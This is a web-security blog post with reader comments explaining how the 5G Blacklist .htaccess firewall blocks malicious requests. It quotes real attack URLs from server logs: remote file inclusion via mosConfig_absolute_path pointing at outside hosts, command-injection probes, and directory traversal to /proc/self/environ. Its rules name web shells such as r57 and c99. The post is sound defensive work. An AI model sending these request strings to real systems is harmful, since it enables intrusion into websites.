Spring Sale! Save 30% on all books w/ code: PLANET24
Web Dev + WordPress + Security

Building the 5G Blacklist

Protecting your website is more important than ever. There are a million ways to do it, and this is one of them. In fact, it’s what I use to protect Perishable Press and other key sites. It’s called the 5G Blacklist, and it’s something I’ve been working on for a long time. The idea is simple enough: analyze bad requests and block them using a firewall/blacklist via .htaccess. Now in its 5th generation, the 5G Blacklist has evolved into a considerably solid method of keeping your site safe and secure. How does it work? I’m glad you asked..

What “normal” site traffic looks like

I’m no expert in traffic analysis, security, or anything else for that matter, but I love to study error logs, and love even more stopping bad guys from spamming, cracking, and exploiting my site. Gots to keep it safe and secure, and a great way to do it is understanding what’s happening behind the scenes on your server.

“Normal” site traffic involves all sorts of requests and a variety of legitimate responses. Ideally, all URL requests for your site’s resources will return a favorable 200 OK status code: user requests something from your site, and the server is able to locate and send the resource back to the user. Hopefully you’re getting plenty of 200-OK responses, but that’s not the only thing happening on your server.

Normally you’re also going to see lots of other types of status codes, depending on how good (or bad) you’ve got things configured/set-up. Here are some examples of hopefully less-common things happening on your server:

  • 301 Moved Permanently – resource moved and redirected permanently
  • 302 Found – resource moved and redirected temporarily
  • 400 Bad Request – server does not understand request
  • 401 Unauthorized – resource is protected, request not authorized
  • 403 Forbidden – server refuses to return the requested resource
  • 404 Not Found – server can’t find the requested resource
  • 410 Gone – requested resource is no longer available
  • 500 Internal Server Error – something is screwed up with the server

..and so on, with all sorts of other responses included in typically lesser volumes. Even a cursory glance through your access/error logs will reveal all sorts of this type of server activity. Normal traffic includes a wide variety of these different responses, proportionally varied depending on your setup.

[ Common Server Responses ]
Relative proportion of top server responses for Perishable Press

The above diagram isn’t scientific, but a good representation of the relative amount of different types of traffic on the server. There’s actually way more 200-OK responses happening, but I didn’t want the graphic to be 7000px in height. Hopefully the idea is clear: you should be getting mostly 200-level responses, and also see a reasonable amount of other responses as well.

What “bad” traffic looks like

Notice in the above diagram that there are quite a few 403 and 404 errors. This is primarily due to the way I have things set up with the 5G Blacklist and other security measures. I spend probably way too much time tracking down and resolving 404s, which otherwise would be much more prevalent. The real key here is the relatively high volume of 403 responses. This is due to implementation of the 5G Firewall/Blacklist. Without it installed, the traffic pattern might look more like this:

[ Relative Server Responses ]
How traffic might look without the 5G Blacklist

Without the 5G in place, there would be way more 404 errors and not nearly as many 403 errors. Why is this? It has to do with what the bad guys are doing when they hit your site, and how the 5G Blacklist works to block the bad stuff and keep your site safe. In general, it goes something like this:

  1. Bad guys use a script to scan your website for vulnerabilities
  2. The script requests anywhere from a few to thousands of different URLs
  3. Virtually all of these malicious requests are targeting non-existent resources using weird-looking, abnormal URLs
  4. The server can’t find any of these weird requests, so it sends back the default 404 response (most often)
  5. As evil scripts continue to scan your site, they waste your server’s precious resources – memory, bandwidth, et al.
  6. The more this happens, the more 404 requests are recorded in your error & access logs

In small volumes, as seen with typical traffic patterns, the default 404 response is perfectly fine, even helpful. If something doesn’t exist, that’s the clearest way of communicating the information. But these days, websites are being targeted and scanned almost constantly, and it seems to get worse every day. The problem with doing nothing and just rolling with the default 404 responses is that it leaves the door open to further exploits should a malicious scan actually find a weakness. For example:

  1. Evil script scans your site and finds a hole at, say, http://example.com/some/crazy/1337/*%*/url
  2. The server would normally return a 404 Not Found response, but won’t if the request can be met (i.e., exploit opportunity)
  3. This allows the attacker to exploit the hole found via the requested URL

And even if the server responds with a 404, there is nothing stopping the attack script from requesting similarly structured URLs. So instead of a single 404 and done with it, malicious scans may continue freely requesting variations on the target URL, for example:

http://example.com/some/crazy/1337/*%*/url
http://example.com/another/crazy/1337/*%*/url
http://example.com/some/crazy/s0-1337/*%*()/url
http://example.com/some/crazy/1337/*%*/url?url=http://blahblah..
http://example.com/something/even/crazier/1337/*%*()/url?payload=

In my experience, it’s better to stop these requests as soon as possible, denying bad guys the chance to scan ad nauseum whatever they want. The key to doing this is understanding what’s happening on your server. Armed with that information, securing your site is a matter of analyzing server logs, matching malicious request patterns, and testing everything until your eyes glaze over and the migraine kicks in..

Or you can let someone else do it.

Building the 5G Blacklist

First of all, here’s how the 5G Blacklist works:

  1. Include the blacklist code in your site’s root .htaccess file
  2. Apache executes the .htaccess directives for each URL request
  3. The 5G Blacklist blocks requests that include matching strings of evil garbage

That’s actually how just about any blacklist/firewall works. There are other ways to protect your site against malicious requests, but handling them at the server level with .htaccess (or the httpd.conf file) is better for performance than say using PHP to connect to the database, or using a WordPress plugin or similar. It’s also easier to install and manage: literally copy, paste, upload, and test. No configuring or editing required. When it’s time to update, just replace with the latest version. The trick is finding a current blacklist that’s been well-tested.

Evolution of the 5G

To see what it is, let’s look at where it’s been:

  1. Ultimate htaccess Blacklist (Compressed Version)
  2. 2G Blacklist: Closing the Door on Malicious Attacks
  3. Perishable Press 3G Blacklist
  4. The Perishable Press 4G Blacklist
  5. 5G Firewall (Beta)

Along the way, I’ve explored a wide variety of different blacklist techniques. The 5G is the culmination of all these efforts, and will eventually be replaced by the imminent 6G Blacklist/Firewall. Currently the beta release is the latest version of the blacklist, and the official/final 5G will be posted soon.

Specific examples

Now let’s look at some specific examples of what we’re blocking with the 5G. I won’t go into depth as I did explaining the building of the 4G blacklist, but will try to cover a good variety of specific examples. Reading through should give you a solid understanding of how blacklists work in general, and a good overview as to what the 5G does to help protect your site.

The simple .css(

We’ll start with one of the most common types of malicious request, those that include the “.css(” character string. Here are some examples:

http://example.com/ip-detection-bad-seo/).css(
http://example.com/ip-detection-bad-seo/);f=e.css(
http://example.com/ip-detection-bad-seo/);this.elem.style.display=a:this.options.display;if(c.css(this.elem,
http://example.com/ip-detection-bad-seo/+b]):f===v.css(e,d):this.css(d,typeof%20f===

Notice the common pattern in these idiot requests: .css(. Instead of trying to block the user-agent or IP address for thousands of these requests, it’s more efficient to identify the best common pattern and block any matches. Here is a simple .htaccess directive that blocks all of these silly requests:

RedirectMatch 403 \.css\(

..but that’s some strong medicine, possibly interfering with legitimate requests. So you need to find balance between effective matching and the number of false positives. We’ll see an example of this just ahead. For now, notice how that single rule effectively blocks the endless stream of “.css(”-type malicious requests.

The ubiquitous mosConfig_absolute_path

Another commonly seen malicious scan involves the targeting of various URLs containing the character string, “mosConfig_absolute_path”. Most often, this is included in the query-string part of the URL, as seen in this fistful of examples:

http://example.com/include.pcchess.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/videodb.class.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=%7Cecho%20%22Origins%22;echo%20%22scanner%22;%7C
http://example.com/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://youregypt.com/id/Ckrid1.txt??
http://example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.fileden.com/files/2011/1/27/3068675//fx29id1.txt??

Again, you could spend a lifetime trying to block these requests using IP or user-agent, but it’s way easier and more efficient to simply block the most effective common pattern, which happens in 5G via this rule:

RewriteCond %{QUERY_STRING} (environ|localhost|mosconfig|scanner) [NC,OR]

This powerful directive also blocks several other strings, including infinite variations on mosconfig, such as mosConfig_absolute_path, as observed in the example URLs. This is why it’s important to carefully construct your .htaccess rules – many malicious requests target known software, and in doing so they include legitimate variables and parameters in the scanned URLs. The 5G is fine-tuned primarily for WordPress sites, so blocking requests for the mosConfig_ pattern is no problem; however, mosConfig_ is an actual part of Joomla, Mambo, and possibly others.

Directory path to heaven

How high can you go? That’s the question some malicious scripts are asking your server about its directory structure. Here’s a rather violent sequence of recursive-directory requests that hit my site recently:

http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/press/2006/01/10/stupid-htaccess-tricks/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ
http://example.com/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/press/2009/12/01/stupid-wordpress-tricks/comment.php?blog=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%00
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/components/com_extcalendar/admin_events.php?CONFIG_EXTLANGUAGES_DIR=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000
http://example.com/dompdf/dompdf.php?input_file=http://www.ourl.in/1???
http://example.com/press/2006/01/10/index.php?ref=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000
http://example.com/press/2006/01/10/index.php?ref=../../../../../../../../../../../../../../../../../../../proc/self/environ%00
http://example.com/press/2006/01/10/index.php?ref=/proc/self/environ

Of course, the least common denominator for this type of request is “../”, which as far as I know is never present in legitimate URI requests. Typically the recursive directory string is included in the query string, so we can use mod_rewrite’s QUERY_STRING variable to block this type of malicious request. The 5G uses the following rule to do the job:

RewriteCond %{QUERY_STRING} \.\./ [NC,OR]

And just for fun, here’s an infographic that attempts to visualize what’s happening on the server for this type of recursive directory traversal request:

[ visualizing recursive directory requests ]
A sort of virtual Inception

Don’t worry if that’s just confusing – it’s mostly hypothetical. The take-home message here is that you can block this type of evil request quite easily, with a single line of code.

Summary

Long posts deserve good summaries. Or something. Here’s a quick recap of the key points in this article:

  • Websites are constantly scanned/attacked by malicious scripts
  • Constant scanning and spamming wastes bandwidth and resources
  • Decreased server performance negatively impacts rank, success
  • It is possible to block a majority of malicious requests
  • The 5G Blacklist is one way of protecting your website
  • The 5G uses regular expressions to block bad requests
  • These expressions match evil character strings in the URL
  • Include the 5G in your site’s root .htaccess file
  • Upload to your server, test thoroughly, and done.

I hope this article is informative and useful. If you have questions or suggestions please share them in the comments. Thanks :)

About the Author
Jeff Starr = Web Developer. Book Author. Secretly Important.
Banhammer: Protect your WordPress site against threats.

20 responses to “Building the 5G Blacklist”

  1. Matt Zimmermann 2011/09/23 9:15 am

    Fantastic article Jeff. I’m looking forward to trying this out.

  2. Pauli Price 2011/09/23 11:29 am

    I read this with interest, and also popped back to read the details of the 4G blacklist.

    I would have been completely on board with you on blocking commas from the root url — except for the fact that I recently implemented just that URL form on my current wordpress install.

    You see the new advanced taxonomy query in WP translates lists of terms that are combined with OR as ‘term1,term2’ and combined with AND as ‘term1+term2’

    I thought it would never work, but indeed example.com/tag-slug/term1,term2 resolved to the taxonomy.php template with both terms included in the tax-query element of the query array.

    I can certainly manually drop that rule while implementing these rules on my site — just thought I’d highlight the issue here for others to consider.

  3. Jessi Hance 2011/09/23 12:01 pm

    The mosconfig stuff is good even for folks running Joomla 1.5 or newer. In fact, there’s a blocking rule in the default .htaccess that comes with Joomla:

    # Block out any script trying to set a mosConfig value through the URL
    # (these attacks wouldn't work w/out Joomla! 1.5's Legacy Mode plugin)
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
  4. You’re still working hard for us, Jeff. I was beginning to think that the 5G might not appear, but I should have had more faith!

    I have a question about performance, though. Will there be any increase in server load and, if so, will it be cancelled out by the reduction in scumbag activity? (Even on a start-up blog that has yet to build up its traffic?) And Iknow that you’re a WordPress guy, but the 5G should also be OK with Drupal, right?

  5. Ron Nitzsche 2011/09/23 2:38 pm

    Thanks a lot for this great read!

  6. Would there be a few special considerations if simply adding this to say Apache 2.2.21’s configuration file per site? I have implemented this and a few others into several small sites I have written.. Kept getting huge entries of attacks.. to bounce traffic/requests away… I remember having to make a few alterations ( and having some issues with access due to names on a file sever.. :P ).. Just wondering.. if the HTACCESS method of implementation is absolutely needed.. as of this point n time..

  7. Rarely has a post from Perishable Press shown up in my RSS reader that was not worth reading.

    Been using 5G beta since Feb with not one problem, looking forward to 6G!

  8. M.K. Safi 2011/09/24 4:22 am

    I use Bad Behavior plugin. But you’re saying handling this at server level is more efficient. This maybe true and I’d like to get on board, but it’s not really easier to install and manage than a plugin. A plugin is a set & forget. 5G needs copying, pasting, testing, and keeping an eye out for updates.

    Have you considered shipping this as a plugin that writes the directives to .htaccess? Bad Behavior cannot protect super cached pages that are served with mod_rewrite because it uses PHP, but 5G would not have this limitation, right?

  9. Doug Smith 2011/09/24 6:34 am

    Thanks so much for your work and sharing of the blacklists. I’ve used them as a part of my overall strategy the few years and they’ve been very helpful.

    I’m glad you posted this article because it served as a good reminder to visit your 5G beta page to share some more of the modifications I’ve made and see what others have shared too.

    • Doug Smith 2011/09/24 8:33 am

      I had forgotten you closed comments after a while when I wrote that. So never mind commenting over on the 5G beta page. :-) Here are a few more things I’ve learned and adding after running the 5G rules for a while.

      – You look for “base64” in the request strings but I’m also seeing a lot of “base64_encode” in the query string so I added that.

      – I’ve also been seeing a lot of query strings looking for “GLOBALS” and “_REQUEST”, followed by various hex codes and equaling various values. Here’s what I’m using to block those. I don’t know if there are valid uses so I only blocked the specific requests I was seeing rather than just those keywords on their own.

      RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
      RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]

      – I constantly see attempts to find the phpMyAdmin script. I do use that script but it’s through cpanel, which obscures it a bit. I use the following lines to block most of the attempts without stopping my use. I’m thinking it could block legitimate use on some server configurations, though.

      RewriteCond %{THE_REQUEST} ^/pma/ [NC,OR]
      RewriteCond %{THE_REQUEST} myadmin [NC,OR]

      – I added “.bs” to the list of file extensions.

      RedirectMatch 403 .(cgi|asp|aspx|cfg|dll|exe|jsp|mdb|sql|ini|rar|bs)$

      – I added “environ” to the request strings.

      RedirectMatch 403 (base64|crossdomain|localhost|wwwroot|environ)

      – I previously mentioned removing “register.php” from the request strings because it was interfering with bbPress registrations. I don’t think this will be a factor with the new bbPress plugin but I’ll need to do some more testing.

      – I’m not sure why but the following line was blocking a check from blogcarnival.com when submitting an article from my site. Since I occasionally participate in blog carnivals I had to remove it.

      RedirectMatch 403 .well-known/host-meta

      – I added a few more php scripts I was seeing frequent probes for to the request strings. I actually have a lot more rules to block probing for software I don’t have but including them in a general ruleset would likely block legitimate use of software others use.

      RedirectMatch 403 (r57|c99|c99ud|bypass|safe0ver).php

      – Ever since the news of the vulnerability in timthumb.php, which used in many WordPress themes, I’ve been seeing a lot of activity looking for that script in known themes to exploit. These rules pretty much take care of it.

      RedirectMatch 403 (tim)?thumb.php
      RedirectMatch 403 phpThumb.php
      RedirectMatch 403 ^/wp-content/(plugins|themes|uploads)/.+/(cache|temp)/

      I hope some of that is helpful to others as well.

  10. Jeff

    Thanks for your work on this! I’ve been using elements of your blacklists since version III and find them invaluable.

    Regarding the 5g version, I’ve found that the some parts of the QUERY STRINGS section block legitimate access to the back end of some Joomla extensions.

  11. Conor Hughes 2011/09/26 5:54 am

    It would apper there is a conflict with Pingdom.com in the 5G blacklist

  12. Sensei Jeff, it’s good to see the 5G going RTM. A ton of rock-solid info here, people take note.

    Just as 80% of success can be achieved by simply turning up, 90% or more of what will screw your site can usually be gleaned from patterns in the access logs.

    I have to admit I’m also a victim of the face-hugger that is the Apache access log (thanks a bunch, Perishable!).

    Plugins can play a role, though. A suitably-crafted plugin can intercept the flow, perhaps informing the blog-dood about specific circumstances that are beyond the scope of existing .htaccess rule sets.

    As you might guess, I’m developing something along those lines right now (which is having an impressive impact on comment spam).

Comments are closed for this post. Something to add? Let me know.
Welcome
Perishable Press is operated by Jeff Starr, a professional web developer and book author with two decades of experience. Here you will find posts about web development, WordPress, security, and more »
Digging Into WordPress: Take your WordPress skills to the next level.
Thoughts
I live right next door to the absolute loudest car in town. And the owner loves to drive it.
8G Firewall now out of beta testing, ready for use on production sites.
It's all about that ad revenue baby.
Note to self: encrypting 500 GB of data on my iMac takes around 8 hours.
Getting back into things after a bit of a break. Currently 7° F outside. Chillz.
2024 is going to make 2020 look like a vacation. Prepare accordingly.
First snow of the year :)
Newsletter
Get news, updates, deals & tips via email.
Email kept private. Easy unsubscribe anytime.